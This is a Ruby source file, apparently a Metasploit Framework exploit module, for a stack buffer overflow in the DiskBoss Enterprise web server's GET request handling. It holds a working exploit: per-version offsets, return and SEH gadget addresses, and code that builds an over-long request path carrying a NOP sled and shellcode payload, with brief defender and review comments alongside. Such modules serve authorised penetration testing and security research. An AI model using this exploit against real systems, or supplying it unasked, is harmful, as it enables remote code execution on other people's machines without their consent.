Path: blob/master/modules/exploits/windows/http/diskboss_get_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for a stack-based buffer overflow in the DiskBoss Enterprise
# built-in web server (v7.4.28, v7.5.12, v8.2.14): an over-long request path in
# an HTTP GET overruns a stack buffer. Three fixed targets plus automatic
# targeting are defined; the check and exploit paths are documented below.
#
# Defender's note: every request this module makes is a plain HTTP GET. The
# fingerprinting request is `GET /`; the triggering request is a `GET` whose
# request path is several thousand bytes of mostly alphabetic text (see the
# rand_text_alpha calls in #exploit). Abnormal request-path length against the
# DiskBoss web port is the observable on the wire; the long-term fix is an
# updated DiskBoss version and not exposing its web interface to untrusted networks.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Remote::HttpClient

  # Module metadata. The 'Targets' array order matters: #exploit indexes it
  # directly (targets[1..3]), so reordering entries here silently breaks
  # automatic targeting.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'DiskBoss Enterprise GET Buffer Overflow',
      'Description' => %q{
        This module exploits a stack-based buffer overflow vulnerability
        in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14,
        caused by improper bounds checking of the request path in HTTP GET
        requests sent to the built-in web server. This module has been
        tested successfully on Windows XP SP3 and Windows 7 SP1.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'vportal', # Vulnerability discovery and PoC
          'Ahmad Mahfouz', # Vulnerability discovery and PoC
          'Gabor Seljan', # Metasploit module
          'Jacob Robles' # Metasploit module
        ],
      'References' =>
        [
          ['EDB', '40869'],
          ['EDB', '42395']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform' => 'win',
      'Payload' =>
        {
          # Bytes that would terminate or alter the request path before it
          # reaches the vulnerable copy (NUL, tab, LF, CR, space).
          'BadChars' => "\x00\x09\x0a\x0d\x20",
          'Space' => 2000
        },
      'Targets' =>
        [
          # targets[0]: version is detected from the banner at run time.
          [
            'Automatic Targeting',
            {
              'auto' => true
            }
          ],
          # targets[1] and targets[2]: 'Offset' is the distance to the saved
          # return address; 'Ret' is a stack-pivot gadget in libpal.dll.
          [
            'DiskBoss Enterprise v7.4.28',
            {
              'Offset' => 2471,
              'Ret' => 0x1004605c # ADD ESP,0x68 # RETN [libpal.dll]
            }
          ],
          [
            'DiskBoss Enterprise v7.5.12',
            {
              'Offset' => 2471,
              'Ret' => 0x100461da # ADD ESP,0x68 # RETN [libpal.dll]
            }
          ],
          # targets[3]: SEH-based variant; 'Offset' is the distance to the SEH
          # record and 'Ret' a POP/POP/RET sequence in libpal.dll.
          [
            'DiskBoss Enterprise v8.2.14',
            {
              'Offset' => 2496,
              'Ret' => 0x1002A8CA # SEH : # POP EDI # POP ESI # RET 04 [libpal.dll]
            }
          ]
        ],
      'Privileged' => true,
      'DisclosureDate' => '2016-12-05',
      'DefaultTarget' => 0))
  end

  # Fingerprints the service from the banner in the `GET /` response body.
  #
  # @return [Exploit::CheckCode] Vulnerable when one of the three known-affected
  #   version strings is present, Detected when the product banner is present
  #   without a matching version, Unknown when there is no 200 response,
  #   Safe otherwise.
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/'
    )

    if res && res.code == 200
      if res.body =~ /DiskBoss Enterprise v(7\.4\.28|7\.5\.12|8\.2\.14)/
        return Exploit::CheckCode::Vulnerable
      elsif res.body =~ /DiskBoss Enterprise/
        return Exploit::CheckCode::Detected
      end
    else
      # NOTE(review): this branch is also reached for a non-200 reply (not only
      # a nil/timed-out response), so the message is a slight over-statement.
      vprint_error('Unable to determine due to a HTTP connection timeout')
      return Exploit::CheckCode::Unknown
    end

    Exploit::CheckCode::Safe
  end

  # Resolves the target (by banner when 'Automatic Targeting' is selected),
  # builds the over-long request path for that target and sends it in a single
  # HTTP GET. Aborts with Failure::NoTarget when no target can be matched.
  def exploit
    mytarget = target

    if target['auto']
      mytarget = nil

      print_status('Automatically detecting the target...')

      res = send_request_cgi(
        'method' => 'GET',
        'uri' => '/'
      )

      # Same banner regexes as #check, mapped onto the fixed entries of
      # 'Targets' by position.
      if res && res.code == 200
        if res.body =~ /DiskBoss Enterprise v7\.4\.28/
          mytarget = targets[1]
        elsif res.body =~ /DiskBoss Enterprise v7\.5\.12/
          mytarget = targets[2]
        elsif res.body =~ /DiskBoss Enterprise v8\.2\.14/
          mytarget = targets[3]
        end
      end

      if !mytarget
        fail_with(Failure::NoTarget, 'No matching target')
      end

      print_status("Selected Target: #{mytarget.name}")
    end

    case mytarget
    when targets[1], targets[2]
      # Return-address overwrite layout: NOP sled, payload, padding up to
      # 'Offset', the libpal.dll gadget address (little-endian), then filler.
      sploit = make_nops(21)
      sploit << payload.encoded
      sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
      sploit << [mytarget.ret].pack('V')
      sploit << rand_text_alpha(2500)
    when targets[3]
      # SEH overwrite layout: payload, padding up to 'Offset', the SEH record,
      # NOPs, a backward jump into the payload, then filler to 5000 bytes.
      seh = generate_seh_record(mytarget.ret)
      # NOTE(review): sploit aliases the String returned by payload.encoded, so
      # the appends below mutate that object in place. Harmless for this single
      # request, but a .dup would be safer if the buffer were ever reused.
      sploit = payload.encoded
      sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
      sploit[sploit.length, seh.length] = seh
      sploit << make_nops(10)
      sploit << Rex::Arch::X86.jmp(0xffffbf25) # JMP to ShellCode
      sploit << rand_text_alpha(5000 - sploit.length)
    else
      fail_with(Failure::NoTarget, 'No matching target')
    end

    # The whole buffer goes out as the request path of one GET; its length
    # (thousands of bytes) is what a network sensor would key on.
    send_request_cgi(
      'method' => 'GET',
      'uri' => sploit
    )
  end
end